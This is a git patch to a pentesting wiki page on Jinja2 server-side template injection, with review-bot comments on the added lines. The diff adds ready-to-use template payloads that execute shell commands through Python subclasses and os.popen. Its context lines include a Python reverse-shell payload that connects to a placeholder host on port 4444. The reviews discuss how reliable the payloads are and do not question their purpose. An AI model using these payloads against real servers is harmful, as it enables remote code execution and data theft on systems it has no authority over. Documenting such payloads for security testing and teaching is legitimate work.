From 0954fe38a897b91d118a4aae800271f07df477ae Mon Sep 17 00:00:00 2001 From: Mane Date: Thu, 28 Mar 2024 15:48:56 +0800 Subject: [PATCH] Update jinja2-ssti.md # Reference https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/ https://ctftime.org/writeup/33605 --- .../ssti-server-side-template-injection/jinja2-ssti.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index b69722dd1..c97e78519 100644
--- a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -153,8 +153,10 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 # The class 396 is the class
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
-# Calling os.popen without guessing the index of the class
+# Without '{{' and '}}'
+{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']() == 'chiv' %} a {% endif %}
+# Calling os.popen without guessing the index of the class
 {% raw %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} 
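Review bot: The `== 'chiv'` comparison on the added `{% if request['application']...['popen']('id')['read']() == 'chiv' %} a {% endif %}` line is a boolean-oracle check that appears to be carried over verbatim from the referenced writeup: it renders `a` only when the output of `id` equals that exact string, so on any other target the payload silently confirms nothing. I would say so in the comment above it, e.g. `# Without '{{' and '}}' — boolean oracle: renders 'a' only if popen('id') output equals the expected string; replace 'chiv' (or the whole comparison) for your target`. Separately, this new `{% if %}` line is placed above the `{% raw %}` tag that wraps the loop payloads below it; if that raw block exists because the site's renderer interprets `{% %}` tags (presumably why the loops are wrapped), the new line should be moved inside the raw block or given its own.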
@@ -163,6 +165,8 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 {% endraw %}
+## Passing the cmd line ?cmd=id, Without " and '
+{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
 ```
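Review bot: The hard-coded subclass index `[276]` on the added `{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1)... }}` line is tied to one Python build: the same page's earlier Popen payload uses index `[396]`, and the loop immediately above this hunk exists precisely to avoid guessing the index, so a reader who copies `276` blindly will most likely hit the wrong class. I would add a comment such as `# 276 = subprocess.Popen on the referenced target; list __subclasses__() first and substitute the index for the target's Python version`. The heading's claim that no `"` or `'` is needed holds for the template expression itself, but the command still arrives through `request.args.cmd`, so this variant only works where Flask's `request` object is reachable from the template context, which is worth stating next to the `?cmd=id` example.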